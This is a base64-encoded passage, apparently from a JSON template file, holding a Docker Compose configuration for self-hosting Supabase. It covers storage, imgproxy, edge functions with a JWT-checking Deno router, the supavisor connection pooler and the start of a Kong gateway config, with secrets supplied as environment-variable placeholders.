LS10cmllcz0xJwogICAgICAgIC0gJy0tc3BpZGVyJwogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6NTAwMC9zdGF0dXMnCiAgICAgIHRpbWVvdXQ6IDVzCiAgICAgIGludGVydmFsOiA1cwogICAgICByZXRyaWVzOiAzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWRVJfUE9SVD01MDAwCiAgICAgIC0gU0VSVkVSX1JFR0lPTj1sb2NhbAogICAgICAtIE1VTFRJX1RFTkFOVD1mYWxzZQogICAgICAtICdBVVRIX0pXVF9TRUNSRVQ9JHtTRVJWSUNFX1BBU1NXT1JEX0pXVH0nCiAgICAgIC0gJ0RBVEFCQVNFX1VSTD1wb3N0Z3JlczovL3N1cGFiYXNlX3N0b3JhZ2VfYWRtaW46JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUAke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn06JHtQT1NUR1JFU19QT1JUOi01NDMyfS8ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gREJfSU5TVEFMTF9ST0xFUz1mYWxzZQogICAgICAtIFNUT1JBR0VfQkFDS0VORD1zMwogICAgICAtIFNUT1JBR0VfUzNfQlVDS0VUPXN0dWIKICAgICAgLSAnU1RPUkFHRV9TM19FTkRQT0lOVD1odHRwOi8vc3VwYWJhc2UtbWluaW86OTAwMCcKICAgICAgLSBTVE9SQUdFX1MzX0ZPUkNFX1BBVEhfU1RZTEU9dHJ1ZQogICAgICAtIFNUT1JBR0VfUzNfUkVHSU9OPXVzLWVhc3QtMQogICAgICAtICdBV1NfQUNDRVNTX0tFWV9JRD0ke1NFUlZJQ0VfVVNFUl9NSU5JT30nCiAgICAgIC0gJ0FXU19TRUNSRVRfQUNDRVNTX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfTUlOSU99JwogICAgICAtIFVQTE9BRF9GSUxFX1NJWkVfTElNSVQ9NTI0Mjg4MDAwCiAgICAgIC0gVVBMT0FEX0ZJTEVfU0laRV9MSU1JVF9TVEFOREFSRD01MjQyODgwMDAKICAgICAgLSBVUExPQURfU0lHTkVEX1VSTF9FWFBJUkFUSU9OX1RJTUU9MTIwCiAgICAgIC0gVFVTX1VSTF9QQVRIPXVwbG9hZC9yZXN1bWFibGUKICAgICAgLSBUVVNfTUFYX1NJWkU9MzYwMDAwMAogICAgICAtIEVOQUJMRV9JTUFHRV9UUkFOU0ZPUk1BVElPTj10cnVlCiAgICAgIC0gJ0lNR1BST1hZX1VSTD1odHRwOi8vaW1ncHJveHk6ODA4MCcKICAgICAgLSBJTUdQUk9YWV9SRVFVRVNUX1RJTUVPVVQ9MTUKICAgICAgLSBEQVRBQkFTRV9TRUFSQ0hfUEFUSD1zdG9yYWdlCiAgICAgIC0gTk9ERV9FTlY9cHJvZHVjdGlvbgogICAgICAtIFJFUVVFU1RfQUxMT1dfWF9GT1JXQVJERURfUEFUSD10cnVlCiAgICB2b2x1bWVzOgogICAgICAtICcuL3ZvbHVtZXMvc3RvcmFnZTovdmFyL2xpYi9zdG9yYWdlJwogIGltZ3Byb3h5OgogICAgaW1hZ2U6ICdkYXJ0aHNpbS9pbWdwcm94eTp2My44LjAnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gaW1ncHJveHkKICAgICAgICAtIGhlYWx0aAogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gSU1HUFJPWFlfTE9DQUxfRklMRVNZU1RFTV9ST09UPS8KICAgICAgLSBJTUdQUk9YWV9VU0VfRVRBRz10cnVlCiAgICAgIC0gJ0lNR1BST1hZX0VOQUJMRV9XRUJQX0RFVEVDVElPTj0ke0lNR1BST1hZX0VOQUJMRV9XRUJQX0RFVEVDVElPTjotdHJ1ZX0nCiAgICB2b2x1bWVzOgogICAgICAtICcuL3ZvbHVtZXMvc3RvcmFnZTovdmFyL2xpYi9zdG9yYWdlJwogIHN1cGFiYXNlLW1ldGE6CiAgICBpbWFnZTogJ3N1cGFiYXNlL3Bvc3RncmVzLW1ldGE6djAuODkuMycKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHN1cGFiYXNlLWFuYWx5dGljczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUEdfTUVUQV9QT1JUPTgwODAKICAgICAgLSAnUEdfTUVUQV9EQl9IT1NUPSR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifScKICAgICAgLSAnUEdfTUVUQV9EQl9QT1JUPSR7UE9TVEdSRVNfUE9SVDotNTQzMn0nCiAgICAgIC0gJ1BHX01FVEFfREJfTkFNRT0ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gUEdfTUVUQV9EQl9VU0VSPXN1cGFiYXNlX2FkbWluCiAgICAgIC0gJ1BHX01FVEFfREJfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICBzdXBhYmFzZS1lZGdlLWZ1bmN0aW9uczoKICAgIGltYWdlOiAnc3VwYWJhc2UvZWRnZS1ydW50aW1lOnYxLjY3LjQnCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSBlY2hvCiAgICAgICAgLSAnRWRnZSBGdW5jdGlvbnMgaXMgaGVhbHRoeScKICAgICAgdGltZW91dDogNXMKICAgICAgaW50ZXJ2YWw6IDVzCiAgICAgIHJldHJpZXM6IDMKICAgIGVudmlyb25tZW50OgogICAgICAtICdKV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtICdTVVBBQkFTRV9VUkw9JHtTRVJWSUNFX0ZRRE5fU1VQQUJBU0VLT05HfScKICAgICAgLSAnU1VQQUJBU0VfQU5PTl9LRVk9JHtTRVJWSUNFX1NVUEFCQVNFQU5PTl9LRVl9JwogICAgICAtICdTVVBBQkFTRV9TRVJWSUNFX1JPTEVfS0VZPSR7U0VSVklDRV9TVVBBQkFTRVNFUlZJQ0VfS0VZfScKICAgICAgLSAnU1VQQUJBU0VfREJfVVJMPXBvc3RncmVzcWw6Ly9wb3N0Z3Jlczoke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9QCR7UE9TVEdSRVNfSE9TVE5BTUU6LXN1cGFiYXNlLWRifToke1BPU1RHUkVTX1BPUlQ6LTU0MzJ9LyR7UE9TVEdSRVNfREI6LXBvc3RncmVzfScKICAgICAgLSAnVkVSSUZZX0pXVD0ke0ZVTkNUSU9OU19WRVJJRllfSldUOi1mYWxzZX0nCiAgICB2b2x1bWVzOgogICAgICAtICcuL3ZvbHVtZXMvZnVuY3Rpb25zOi9ob21lL2Rlbm8vZnVuY3Rpb25zJwogICAgICAtCiAgICAgICAgdHlwZTogYmluZAogICAgICAgIHNvdXJjZTogLi92b2x1bWVzL2Z1bmN0aW9ucy9tYWluL2luZGV4LnRzCiAgICAgICAgdGFyZ2V0OiAvaG9tZS9kZW5vL2Z1bmN0aW9ucy9tYWluL2luZGV4LnRzCiAgICAgICAgY29udGVudDogImltcG9ydCB7IHNlcnZlIH0gZnJvbSAnaHR0cHM6Ly9kZW5vLmxhbmQvc3RkQDAuMTMxLjAvaHR0cC9zZXJ2ZXIudHMnXG5pbXBvcnQgKiBhcyBqb3NlIGZyb20gJ2h0dHBzOi8vZGVuby5sYW5kL3gvam9zZUB2NC4xNC40L2luZGV4LnRzJ1xuXG5jb25zb2xlLmxvZygnbWFpbiBmdW5jdGlvbiBzdGFydGVkJylcblxuY29uc3QgSldUX1NFQ1JFVCA9IERlbm8uZW52LmdldCgnSldUX1NFQ1JFVCcpXG5jb25zdCBWRVJJRllfSldUID0gRGVuby5lbnYuZ2V0KCdWRVJJRllfSldUJykgPT09ICd0cnVlJ1xuXG5mdW5jdGlvbiBnZXRBdXRoVG9rZW4ocmVxOiBSZXF1ZXN0KSB7XG4gIGNvbnN0IGF1dGhIZWFkZXIgPSByZXEuaGVhZGVycy5nZXQoJ2F1dGhvcml6YXRpb24nKVxuICBpZiAoIWF1dGhIZWFkZXIpIHtcbiAgICB0aHJvdyBuZXcgRXJyb3IoJ01pc3NpbmcgYXV0aG9yaXphdGlvbiBoZWFkZXInKVxuICB9XG4gIGNvbnN0IFtiZWFyZXIsIHRva2VuXSA9IGF1dGhIZWFkZXIuc3BsaXQoJyAnKVxuICBpZiAoYmVhcmVyICE9PSAnQmVhcmVyJykge1xuICAgIHRocm93IG5ldyBFcnJvcihgQXV0aCBoZWFkZXIgaXMgbm90ICdCZWFyZXIge3Rva2VufSdgKVxuICB9XG4gIHJldHVybiB0b2tlblxufVxuXG5hc3luYyBmdW5jdGlvbiB2ZXJpZnlKV1Qoand0OiBzdHJpbmcpOiBQcm9taXNlPGJvb2xlYW4+IHtcbiAgY29uc3QgZW5jb2RlciA9IG5ldyBUZXh0RW5jb2RlcigpXG4gIGNvbnN0IHNlY3JldEtleSA9IGVuY29kZXIuZW5jb2RlKEpXVF9TRUNSRVQpXG4gIHRyeSB7XG4gICAgYXdhaXQgam9zZS5qd3RWZXJpZnkoand0LCBzZWNyZXRLZXkpXG4gIH0gY2F0Y2ggKGVycikge1xuICAgIGNvbnNvbGUuZXJyb3IoZXJyKVxuICAgIHJldHVybiBmYWxzZVxuICB9XG4gIHJldHVybiB0cnVlXG59XG5cbnNlcnZlKGFzeW5jIChyZXE6IFJlcXVlc3QpID0+IHtcbiAgaWYgKHJlcS5tZXRob2QgIT09ICdPUFRJT05TJyAmJiBWRVJJRllfSldUKSB7XG4gICAgdHJ5IHtcbiAgICAgIGNvbnN0IHRva2VuID0gZ2V0QXV0aFRva2VuKHJlcSlcbiAgICAgIGNvbnN0IGlzVmFsaWRKV1QgPSBhd2FpdCB2ZXJpZnlKV1QodG9rZW4pXG5cbiAgICAgIGlmICghaXNWYWxpZEpXVCkge1xuICAgICAgICByZXR1cm4gbmV3IFJlc3BvbnNlKEpTT04uc3RyaW5naWZ5KHsgbXNnOiAnSW52YWxpZCBKV1QnIH0pLCB7XG4gICAgICAgICAgc3RhdHVzOiA0MDEsXG4gICAgICAgICAgaGVhZGVyczogeyAnQ29udGVudC1UeXBlJzogJ2FwcGxpY2F0aW9uL2pzb24nIH0sXG4gICAgICAgIH0pXG4gICAgICB9XG4gICAgfSBjYXRjaCAoZSkge1xuICAgICAgY29uc29sZS5lcnJvcihlKVxuICAgICAgcmV0dXJuIG5ldyBSZXNwb25zZShKU09OLnN0cmluZ2lmeSh7IG1zZzogZS50b1N0cmluZygpIH0pLCB7XG4gICAgICAgIHN0YXR1czogNDAxLFxuICAgICAgICBoZWFkZXJzOiB7ICdDb250ZW50LVR5cGUnOiAnYXBwbGljYXRpb24vanNvbicgfSxcbiAgICAgIH0pXG4gICAgfVxuICB9XG5cbiAgY29uc3QgdXJsID0gbmV3IFVSTChyZXEudXJsKVxuICBjb25zdCB7IHBhdGhuYW1lIH0gPSB1cmxcbiAgY29uc3QgcGF0aF9wYXJ0cyA9IHBhdGhuYW1lLnNwbGl0KCcvJylcbiAgY29uc3Qgc2VydmljZV9uYW1lID0gcGF0aF9wYXJ0c1sxXVxuXG4gIGlmICghc2VydmljZV9uYW1lIHx8IHNlcnZpY2VfbmFtZSA9PT0gJycpIHtcbiAgICBjb25zdCBlcnJvciA9IHsgbXNnOiAnbWlzc2luZyBmdW5jdGlvbiBuYW1lIGluIHJlcXVlc3QnIH1cbiAgICByZXR1cm4gbmV3IFJlc3BvbnNlKEpTT04uc3RyaW5naWZ5KGVycm9yKSwge1xuICAgICAgc3RhdHVzOiA0MDAsXG4gICAgICBoZWFkZXJzOiB7ICdDb250ZW50LVR5cGUnOiAnYXBwbGljYXRpb24vanNvbicgfSxcbiAgICB9KVxuICB9XG5cbiAgY29uc3Qgc2VydmljZVBhdGggPSBgL2hvbWUvZGVuby9mdW5jdGlvbnMvJHtzZXJ2aWNlX25hbWV9YFxuICBjb25zb2xlLmVycm9yKGBzZXJ2aW5nIHRoZSByZXF1ZXN0IHdpdGggJHtzZXJ2aWNlUGF0aH1gKVxuXG4gIGNvbnN0IG1lbW9yeUxpbWl0TWIgPSAxNTBcbiAgY29uc3Qgd29ya2VyVGltZW91dE1zID0gMSAqIDYwICogMTAwMFxuICBjb25zdCBub01vZHVsZUNhY2hlID0gZmFsc2VcbiAgY29uc3QgaW1wb3J0TWFwUGF0aCA9IG51bGxcbiAgY29uc3QgZW52VmFyc09iaiA9IERlbm8uZW52LnRvT2JqZWN0KClcbiAgY29uc3QgZW52VmFycyA9IE9iamVjdC5rZXlzKGVudlZhcnNPYmopLm1hcCgoaykgPT4gW2ssIGVudlZhcnNPYmpba11dKVxuXG4gIHRyeSB7XG4gICAgY29uc3Qgd29ya2VyID0gYXdhaXQgRWRnZVJ1bnRpbWUudXNlcldvcmtlcnMuY3JlYXRlKHtcbiAgICAgIHNlcnZpY2VQYXRoLFxuICAgICAgbWVtb3J5TGltaXRNYixcbiAgICAgIHdvcmtlclRpbWVvdXRNcyxcbiAgICAgIG5vTW9kdWxlQ2FjaGUsXG4gICAgICBpbXBvcnRNYXBQYXRoLFxuICAgICAgZW52VmFycyxcbiAgICB9KVxuICAgIHJldHVybiBhd2FpdCB3b3JrZXIuZmV0Y2gocmVxKVxuICB9IGNhdGNoIChlKSB7XG4gICAgY29uc3QgZXJyb3IgPSB7IG1zZzogZS50b1N0cmluZygpIH1cbiAgICByZXR1cm4gbmV3IFJlc3BvbnNlKEpTT04uc3RyaW5naWZ5KGVycm9yKSwge1xuICAgICAgc3RhdHVzOiA1MDAsXG4gICAgICBoZWFkZXJzOiB7ICdDb250ZW50LVR5cGUnOiAnYXBwbGljYXRpb24vanNvbicgfSxcbiAgICB9KVxuICB9XG59KSIKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9mdW5jdGlvbnMvaGVsbG8vaW5kZXgudHMKICAgICAgICB0YXJnZXQ6IC9ob21lL2Rlbm8vZnVuY3Rpb25zL2hlbGxvL2luZGV4LnRzCiAgICAgICAgY29udGVudDogIi8vIEZvbGxvdyB0aGlzIHNldHVwIGd1aWRlIHRvIGludGVncmF0ZSB0aGUgRGVubyBsYW5ndWFnZSBzZXJ2ZXIgd2l0aCB5b3VyIGVkaXRvcjpcbi8vIGh0dHBzOi8vZGVuby5sYW5kL21hbnVhbC9nZXR0aW5nX3N0YXJ0ZWQvc2V0dXBfeW91cl9lbnZpcm9ubWVudFxuLy8gVGhpcyBlbmFibGVzIGF1dG9jb21wbGV0ZSwgZ28gdG8gZGVmaW5pdGlvbiwgZXRjLlxuXG5pbXBvcnQgeyBzZXJ2ZSB9IGZyb20gXCJodHRwczovL2Rlbm8ubGFuZC9zdGRAMC4xNzcuMS9odHRwL3NlcnZlci50c1wiXG5cbnNlcnZlKGFzeW5jICgpID0+IHtcbiAgcmV0dXJuIG5ldyBSZXNwb25zZShcbiAgICBgXCJIZWxsbyBmcm9tIEVkZ2UgRnVuY3Rpb25zIVwiYCxcbiAgICB7IGhlYWRlcnM6IHsgXCJDb250ZW50LVR5cGVcIjogXCJhcHBsaWNhdGlvbi9qc29uXCIgfSB9LFxuICApXG59KVxuXG4vLyBUbyBpbnZva2U6XG4vLyBjdXJsICdodHRwOi8vbG9jYWxob3N0OjxLT05HX0hUVFBfUE9SVD4vZnVuY3Rpb25zL3YxL2hlbGxvJyBcXFxuLy8gICAtLWhlYWRlciAnQXV0aG9yaXphdGlvbjogQmVhcmVyIDxhbm9uL3NlcnZpY2Vfcm9sZSBBUEkga2V5PidcbiIKICAgIGNvbW1hbmQ6CiAgICAgIC0gc3RhcnQKICAgICAgLSAnLS1tYWluLXNlcnZpY2UnCiAgICAgIC0gL2hvbWUvZGVuby9mdW5jdGlvbnMvbWFpbgogIHN1cGFiYXNlLXN1cGF2aXNvcjoKICAgIGltYWdlOiAnc3VwYWJhc2Uvc3VwYXZpc29yOjIuNS4xJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIGN1cmwKICAgICAgICAtICctc1NmTCcKICAgICAgICAtICctbycKICAgICAgICAtIC9kZXYvbnVsbAogICAgICAgIC0gJ2h0dHA6Ly8xMjcuMC4wLjE6NDAwMC9hcGkvaGVhbHRoJwogICAgICB0aW1lb3V0OiA1cwogICAgICBpbnRlcnZhbDogNXMKICAgICAgcmV0cmllczogMTAKICAgIGRlcGVuZHNfb246CiAgICAgIHN1cGFiYXNlLWRiOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICAgIHN1cGFiYXNlLWFuYWx5dGljczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gUE9PTEVSX1RFTkFOVF9JRD1kZXZfdGVuYW50CiAgICAgIC0gUE9PTEVSX1BPT0xfTU9ERT10cmFuc2FjdGlvbgogICAgICAtICdQT09MRVJfREVGQVVMVF9QT09MX1NJWkU9JHtQT09MRVJfREVGQVVMVF9QT09MX1NJWkU6LTIwfScKICAgICAgLSAnUE9PTEVSX01BWF9DTElFTlRfQ09OTj0ke1BPT0xFUl9NQVhfQ0xJRU5UX0NPTk46LTEwMH0nCiAgICAgIC0gUE9SVD00MDAwCiAgICAgIC0gJ1BPU1RHUkVTX1BPUlQ9JHtQT1NUR1JFU19QT1JUOi01NDMyfScKICAgICAgLSAnUE9TVEdSRVNfSE9TVE5BTUU9JHtQT1NUR1JFU19IT1NUTkFNRTotc3VwYWJhc2UtZGJ9JwogICAgICAtICdQT1NUR1JFU19EQj0ke1BPU1RHUkVTX0RCOi1wb3N0Z3Jlc30nCiAgICAgIC0gJ1BPU1RHUkVTX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9QT1NUR1JFU30nCiAgICAgIC0gJ0RBVEFCQVNFX1VSTD1lY3RvOi8vc3VwYWJhc2VfYWRtaW46JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfUAke1BPU1RHUkVTX0hPU1ROQU1FOi1zdXBhYmFzZS1kYn06JHtQT1NUR1JFU19QT1JUOi01NDMyfS9fc3VwYWJhc2UnCiAgICAgIC0gQ0xVU1RFUl9QT1NUR1JFUz10cnVlCiAgICAgIC0gJ1NFQ1JFVF9LRVlfQkFTRT0ke1NFUlZJQ0VfUEFTU1dPUkRfU1VQQVZJU09SU0VDUkVUfScKICAgICAgLSAnVkFVTFRfRU5DX0tFWT0ke1NFUlZJQ0VfUEFTU1dPUkRfVkFVTFRFTkN9JwogICAgICAtICdBUElfSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSAnTUVUUklDU19KV1RfU0VDUkVUPSR7U0VSVklDRV9QQVNTV09SRF9KV1R9JwogICAgICAtIFJFR0lPTj1sb2NhbAogICAgICAtICdFUkxfQUZMQUdTPS1wcm90b19kaXN0IGluZXRfdGNwJwogICAgY29tbWFuZDoKICAgICAgLSAvYmluL3NoCiAgICAgIC0gJy1jJwogICAgICAtICcvYXBwL2Jpbi9taWdyYXRlICYmIC9hcHAvYmluL3N1cGF2aXNvciBldmFsICIkJChjYXQgL2V0Yy9wb29sZXIvcG9vbGVyLmV4cykiICYmIC9hcHAvYmluL3NlcnZlcicKICAgIHZvbHVtZXM6CiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL3ZvbHVtZXMvcG9vbGVyL3Bvb2xlci5leHMKICAgICAgICB0YXJnZXQ6IC9ldGMvcG9vbGVyL3Bvb2xlci5leHMKICAgICAgICBjb250ZW50OiAiezpvaywgX30gPSBBcHBsaWNhdGlvbi5lbnN1cmVfYWxsX3N0YXJ0ZWQoOnN1cGF2aXNvcilcbns6b2ssIHZlcnNpb259ID1cbiAgICBjYXNlIFN1cGF2aXNvci5SZXBvLnF1ZXJ5IShcInNlbGVjdCB2ZXJzaW9uKClcIikgZG9cbiAgICAle3Jvd3M6IFtbdmVyXV19IC0+IFN1cGF2aXNvci5IZWxwZXJzLnBhcnNlX3BnX3ZlcnNpb24odmVyKVxuICAgIF8gLT4gbmlsXG4gICAgZW5kXG5wYXJhbXMgPSAle1xuICAgIFwiZXh0ZXJuYWxfaWRcIiA9PiBTeXN0ZW0uZ2V0X2VudihcIlBPT0xFUl9URU5BTlRfSURcIiksXG4gICAgXCJkYl9ob3N0XCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT1NUR1JFU19IT1NUTkFNRVwiKSxcbiAgICBcImRiX3BvcnRcIiA9PiBTeXN0ZW0uZ2V0X2VudihcIlBPU1RHUkVTX1BPUlRcIikgfD4gU3RyaW5nLnRvX2ludGVnZXIoKSxcbiAgICBcImRiX2RhdGFiYXNlXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT1NUR1JFU19EQlwiKSxcbiAgICBcInJlcXVpcmVfdXNlclwiID0+IGZhbHNlLFxuICAgIFwiYXV0aF9xdWVyeVwiID0+IFwiU0VMRUNUICogRlJPTSBwZ2JvdW5jZXIuZ2V0X2F1dGgoJDEpXCIsXG4gICAgXCJkZWZhdWx0X21heF9jbGllbnRzXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT09MRVJfTUFYX0NMSUVOVF9DT05OXCIpLFxuICAgIFwiZGVmYXVsdF9wb29sX3NpemVcIiA9PiBTeXN0ZW0uZ2V0X2VudihcIlBPT0xFUl9ERUZBVUxUX1BPT0xfU0laRVwiKSxcbiAgICBcImRlZmF1bHRfcGFyYW1ldGVyX3N0YXR1c1wiID0+ICV7XCJzZXJ2ZXJfdmVyc2lvblwiID0+IHZlcnNpb259LFxuICAgIFwidXNlcnNcIiA9PiBbJXtcbiAgICBcImRiX3VzZXJcIiA9PiBcInBnYm91bmNlclwiLFxuICAgIFwiZGJfcGFzc3dvcmRcIiA9PiBTeXN0ZW0uZ2V0X2VudihcIlBPU1RHUkVTX1BBU1NXT1JEXCIpLFxuICAgIFwibW9kZV90eXBlXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT09MRVJfUE9PTF9NT0RFXCIpLFxuICAgIFwicG9vbF9zaXplXCIgPT4gU3lzdGVtLmdldF9lbnYoXCJQT09MRVJfREVGQVVMVF9QT09MX1NJWkVcIiksXG4gICAgXCJpc19tYW5hZ2VyXCIgPT4gdHJ1ZVxuICAgIH1dXG59XG5cbnRlbmFudCA9IFN1cGF2aXNvci5UZW5hbnRzLmdldF90ZW5hbnRfYnlfZXh0ZXJuYWxfaWQocGFyYW1zW1wiZXh0ZXJuYWxfaWRcIl0pXG5cbmlmIHRlbmFudCBkb1xuICB7Om9rLCBffSA9IFN1cGF2aXNvci5UZW5hbnRzLnVwZGF0ZV90ZW5hbnQodGVuYW50LCBwYXJhbXMpXG5lbHNlXG4gIHs6b2ssIF99ID0gU3VwYXZpc29yLlRlbmFudHMuY3JlYXRlX3RlbmFudChwYXJhbXMpXG5lbmRcbiIK",
+        "compose": "c2VydmljZXM6CiAgc3VwYWJhc2Uta29uZzoKICAgIGltYWdlOiAna29uZzoyLjguMScKICAgIGVudHJ5cG9pbnQ6ICdiYXNoIC1jICcnZXZhbCAiZWNobyBcIiQkKGNhdCB+L3RlbXAueW1sKVwiIiA+IH4va29uZy55bWwgJiYgL2RvY2tlci1lbnRyeXBvaW50LnNoIGtvbmcgZG9ja2VyLXN0YXJ0JycnCiAgICBkZXBlbmRzX29uOgogICAgICBzdXBhYmFzZS1hbmFseXRpY3M6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9TVVBBQkFTRUtPTkdfODAwMAogICAgICAtICdLT05HX1BPUlRfTUFQUz00NDM6ODAwMCcKICAgICAgLSAnSldUX1NFQ1JFVD0ke1NFUlZJQ0VfUEFTU1dPUkRfSldUfScKICAgICAgLSBLT05HX0RBVEFCQVNFPW9mZgogICAgICAtIEtPTkdfREVDTEFSQVRJVkVfQ09ORklHPS9ob21lL2tvbmcva29uZy55bWwKICAgICAgLSAnS09OR19ETlNfT1JERVI9TEFTVCxBLENOQU1FJwogICAgICAtICdLT05HX1BMVUdJTlM9cmVxdWVzdC10cmFuc2Zvcm1lcixjb3JzLGtleS1hdXRoLGFjbCxiYXNpYy1hdXRoJwogICAgICAtIEtPTkdfTkdJTlhfUFJPWFlfUFJPWFlfQlVGRkVSX1NJWkU9MTYwawogICAgICAtICdLT05HX05HSU5YX1BST1hZX1BST1hZX0JVRkZFUlM9NjQgMTYwaycKICAgICAgLSAnU1VQQUJBU0VfQU5PTl9LRVk9JHtTRVJWSUNFX1NVUEFCQVNFQU5PTl9LRVl9JwogICAgICAtICdTVVBBQkFTRV9TRVJWSUNFX0tFWT0ke1NFUlZJQ0VfU1VQQUJBU0VTRVJWSUNFX0tFWX0nCiAgICAgIC0gJ0RBU0hCT0FSRF9VU0VSTkFNRT0ke1NFUlZJQ0VfVVNFUl9BRE1JTn0nCiAgICAgIC0gJ0RBU0hCT0FSRF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfQURNSU59JwogICAgdm9sdW1lczoKICAgICAgLQogICAgICAgIHR5cGU6IGJpbmQKICAgICAgICBzb3VyY2U6IC4vdm9sdW1lcy9hcGkva29uZy55bWwKICAgICAgICB0YXJnZXQ6IC9ob21lL2tvbmcvdGVtcC55bWwKICAgICAgICBjb250ZW50OiAiX2Zvcm1hdF92ZXJzaW9uOiAnMi4xJ1xuX3RyYW5zZm9ybTogdHJ1ZVxuXG4jIyNcbiMjIyBDb25zdW1lcnMgLyBVc2Vyc1xuIyMjXG5jb25zdW1lcnM6XG4gIC0gdXNlcm5hbWU6IERBU0hCT0FSRFxuICAtIHVzZXJuYW1lOiBhbm9uXG4gICAga2V5YXV0aF9jcmVkZW50aWFsczpcbiAgICAgIC0ga2V5OiAkU1VQQUJBU0VfQU5PTl9LRVlcbiAgLSB1c2VybmFtZTogc2VydmljZV9yb2xlXG4gICAga2V5YXV0aF9jcmVkZW50aWFsczpcbiAgICAgIC0ga2V5OiAkU1VQQUJBU0VfU0VSVklDRV9LRVlcblxuIyMjXG4jIyMgQWNjZXNzIENvbnRyb2wgTGlzdFxuIyMjXG5hY2xzOlxuICAtIGNvbnN1bWVyOiBhbm9uXG4gICAgZ3JvdXA6IGFub25cbiAgLSBjb25zdW1lcjogc2VydmljZV9yb2xlXG4gICAgZ3JvdXA6IGFkbWluXG5cbiMjI1xuIyMjIERhc2hib2FyZCBjcmVkZW50aWFsc1xuIyMjXG5iYXNpY2F1dGhfY3JlZGVudGlhbHM6XG4tIGNvbnN1bWVyOiBEQVNIQk9BUkRcbiAgdXNlcm5hbWU6ICREQVNIQk9BUkRfVVNFUk5BTUVcbiAgcGFzc3dvcmQ6ICREQVNIQk9BUkRfUEFTU1dPUkRcblxuXG4jIyNcbiMjIyBBUEkgUm91dGVzXG4jIyNcbnNlcnZpY2VzOlxuXG4gICMjIE9wZW4gQXV0aCByb3V0ZXNcbiAgLSBuYW1lOiBhdXRoLXYxLW9wZW5cbiAgICB1cmw6IGh0dHA6Ly9zdXBhYmFzZS1hdXRoOjk5OTkvdmVyaWZ5XG4gICAgcm91dGVzOlxuICAgICAgLSBuYW1lOiBhdXRoLXYxLW9wZW5cbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9hdXRoL3YxL3ZlcmlmeVxuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcbiAgLSBuYW1lOiBhdXRoLXYxLW9wZW4tY2FsbGJhY2tcbiAgICB1cmw6IGh0dHA6Ly9zdXBhYmFzZS1hdXRoOjk5OTkvY2FsbGJhY2tcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGF1dGgtdjEtb3Blbi1jYWxsYmFja1xuICAgICAgICBzdHJpcF9wYXRoOiB0cnVlXG4gICAgICAgIHBhdGhzOlxuICAgICAgICAgIC0gL2F1dGgvdjEvY2FsbGJhY2tcbiAgICBwbHVnaW5zOlxuICAgICAgLSBuYW1lOiBjb3JzXG4gIC0gbmFtZTogYXV0aC12MS1vcGVuLWF1dGhvcml6ZVxuICAgIHVybDogaHR0cDovL3N1cGFiYXNlLWF1dGg6OTk5OS9hdXRob3JpemVcbiAgICByb3V0ZXM6XG4gICAgICAtIG5hbWU6IGF1dGgtdjEtb3Blbi1hdXRob3JpemVcbiAgICAgICAgc3RyaXBfcGF0aDogdHJ1ZVxuICAgICAgICBwYXRoczpcbiAgICAgICAgICAtIC9hdXRoL3YxL2F1dGhvcml6ZVxuICAgIHBsdWdpbnM6XG4gICAgICAtIG5hbWU6IGNvcnNcblxuICAjIyBTZWN1cmUgQXV0aCByb3V0ZXNcbiAgLSBuYW1lOiBhdXRoLXYxXG4gICAgX2NvbW1lbnQ6ICdHb1RydWU6IC9hdXRoL3YxLyogLT4gaHR0